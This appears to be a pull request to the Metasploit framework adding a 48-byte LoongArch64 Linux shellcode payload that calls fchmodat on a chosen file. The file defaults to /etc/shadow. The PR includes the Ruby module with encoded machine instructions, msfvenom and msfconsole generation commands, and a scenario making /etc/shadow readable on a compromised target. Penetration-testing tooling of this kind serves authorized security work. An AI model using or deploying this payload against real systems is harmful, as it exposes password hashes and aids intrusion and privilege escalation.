### PR TITLE
Add Linux LoongArch64 chmod payload

### DIFF
--- a/documentation/modules/payload/linux/loongarch64/chmod.md
+++ b/documentation/modules/payload/linux/loongarch64/chmod.md
@@ -1,0 +1,69 @@
+## Vulnerable Application
+
+This payload targets Linux systems running on the LoongArch64 architecture. It uses the
+`fchmodat` syscall (syscall number 53) to change the permissions of a specified file, then
+exits cleanly via the `exit` syscall (syscall number 93).
+
+The payload is a 48-byte position-independent shellcode stub. It is suitable for use in
+exploits targeting LoongArch64 Linux systems where arbitrary code execution has been achieved.
+
+## Verification Steps
+
+1. Generate the payload as an ELF executable:
+   ```
+   ./msfvenom -p linux/loongarch64/chmod FILE=/tmp/testfile MODE=0777 -f elf -o chmod.elf
+   chmod +x chmod.elf
+   ```
+2. Run it under QEMU user-mode emulation:
+   ```
+   qemu-loongarch64 -strace ./chmod.elf
+   ```
+3. Confirm the `fchmodat` syscall was made and returned 0:
+   ```
+   fchmodat(AT_FDCWD,"/tmp/testfile",0777,0) = 0
+   exit(0)
+   ```
+4. Verify the file permissions changed:
+   ```
+   ls -la /tmp/testfile
+   ```
+
+## Options
+
+### FILE
+
+The full path of the file to chmod on the target system. Defaults to `/etc/shadow`.
+
+### MODE
+
+The desired file permissions in octal notation (e.g. `0777`, `0666`, `0644`). Defaults to `0666`.
+Must not exceed `0xFFF` (octal `07777`).
+
+## Scenarios
+
+### LoongArch64 Linux — making /etc/shadow world-readable
+
+This scenario demonstrates using the payload to make `/etc/shadow` readable after gaining
+code execution on a LoongArch64 Linux target.
+
+#### Version and OS: LoongArch64 Linux (tested with qemu-loongarch64)
+
+Generate the payload:
+
+```
+msf6 > use payload/linux/loongarch64/chmod
+msf6 payload(linux/loongarch64/chmod) > set FILE /etc/shadow
+FILE => /etc/shadow
+msf6 payload(linux/loongarch64/chmod) > set MODE 0644
+MODE => 0644
+msf6 payload(linux/loongarch64/chmod) > generate -f elf -o /tmp/chmod.elf
+[*] Writing 168 bytes to /tmp/chmod.elf...
+```
+
+Run on target (or via QEMU for testing):
+
+```
+$ qemu-loongarch64 -strace /tmp/chmod.elf
+fchmodat(AT_FDCWD,"/etc/shadow",0644,0) = 0
+exit(0)
+```

--- a/modules/payloads/singles/linux/loongarch64/chmod.rb
+++ b/modules/payloads/singles/linux/loongarch64/chmod.rb
@@ -29,7 +29,7 @@ module MetasploitModule
     )
     register_options([
       OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),
-      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ]),
+      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ], regex: /\A[0-7]+\z/),
     ])
   end
 
@@ -41,8 +41,6 @@ module MetasploitModule
   # @return [Integer] the desired mode for the file
   def mode
     (datastore['MODE'] || '0666').oct
-  rescue StandardError => e
-    raise ArgumentError, "Invalid chmod mode '#{datastore['MODE']}': #{e.message}"
   end
 
   # @return [Integer] LoongArch64 instruction to load mode into $a2 register
@@ -66,10 +64,10 @@ module MetasploitModule
       0x0381740b,  # ori $a7, $zero, 93       # __NR_exit
       0x002b0101,  # syscall 0x101
     ].pack('V*')
-    shellcode += chmod_file_path + "\x00"
+    shellcode += chmod_file_path + "\x00".b
 
     # align our shellcode to 4 bytes
-    shellcode += "\x00" while shellcode.bytesize % 4 != 0
+    shellcode += "\x00".b while shellcode.bytesize % 4 != 0
 
     super.to_s + shellcode
   end

--- a/modules/payloads/singles/linux/loongarch64/chmod.rb
+++ b/modules/payloads/singles/linux/loongarch64/chmod.rb
@@ -1,0 +1,76 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  CachedSize = 48
+
+  include Msf::Payload::Single
+  include Msf::Payload::Linux
+
+  def initialize(info = {})
+    super(
+      merge_info(
+        info,
+        'Name' => 'Linux Chmod',
+        'Description' => 'Runs chmod on the specified file with specified mode.',
+        'Author' => 'bcoles',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_LOONGARCH64,
+        'References' => [
+          ['URL', 'https://man7.org/linux/man-pages/man2/fchmodat.2.html'],
+          ['URL', 'https://github.com/bcoles/shellcode/blob/main/loongarch64/chmod/chmod.s'],
+        ]
+      )
+    )
+    register_options([
+      OptString.new('FILE', [ true, 'Filename to chmod', '/etc/shadow' ]),
+      OptString.new('MODE', [ true, 'File mode (octal)', '0666' ]),
+    ])
+  end
+
+  # @return [String] the full path of the file to be modified
+  def chmod_file_path
+    datastore['FILE'] || ''
+  end
+
+  # @return [Integer] the desired mode for the file
+  def mode
+    (datastore['MODE'] || '0666').oct
+  rescue StandardError => e
+    raise ArgumentError, "Invalid chmod mode '#{datastore['MODE']}': #{e.message}"
+  end
+
+  # @return [Integer] LoongArch64 instruction to load mode into $a2 register
+  # Uses ori $a2, $zero, <mode> instruction encoding
+  # For example: 0x0386d806 ; ori $a2, $zero, 0x1b6 ; loads 0o666 into $a2
+  def chmod_instruction(mode)
+    0x03800006 | ((mode & 0xfff) << 10)
+  end
+
+  def generate(_opts = {})
+    raise ArgumentError, "chmod mode (#{mode}) is greater than maximum mode size (0xFFF)" if mode > 0xFFF
+
+    shellcode = [
+      0x02fe7004,  # addi.d $a0, $zero, -100  # AT_FDCWD
+      0x18000105,  # pcaddi $a1, 8            # pointer to path
+      chmod_instruction(mode), # ori $a2, $zero, <mode>
+      0x03800007,  # ori $a3, $zero, 0        # flags
+      0x0380d40b,  # ori $a7, $zero, 53       # __NR_fchmodat
+      0x002b0101,  # syscall 0x101
+      0x03800004,  # ori $a0, $zero, 0        # exit code
+      0x0381740b,  # ori $a7, $zero, 93       # __NR_exit
+      0x002b0101,  # syscall 0x101
+    ].pack('V*')
+    shellcode += chmod_file_path + "\x00"
+
+    # align our shellcode to 4 bytes
+    shellcode += "\x00" while shellcode.bytesize % 4 != 0
+
+    super.to_s + shellcode
+  end
+end

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -2059,6 +2059,15 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'linux/riscv64le/shell_reverse_tcp'
   end
 
+  context 'linux/loongarch64/chmod' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/linux/loongarch64/chmod'
+                          ],
+                          modules_pathname: modules_pathname,
+                          reference_name: 'linux/loongarch64/chmod'
+  end
+
   context 'linux/loongarch64/reboot' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [


### PR DESCRIPTION
## Verification

```
$ ./msfvenom -p linux/loongarch64/chmod FILE=/tmp/asdf MODE=777 -f elf -o chmod.elf && chmod +x chmod.elf 
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: loongarch64 from the payload
No encoder specified, outputting raw payload
Payload size: 48 bytes
Final size of elf file: 168 bytes
Saved as: chmod.elf
```

```
$ /home/user/qemu/build/qemu-loongarch64 -strace ./chmod.elf 
3129433 fchmodat(AT_FDCWD,"/tmp/asdf",0777,0) = 0
3129433 exit(0)
```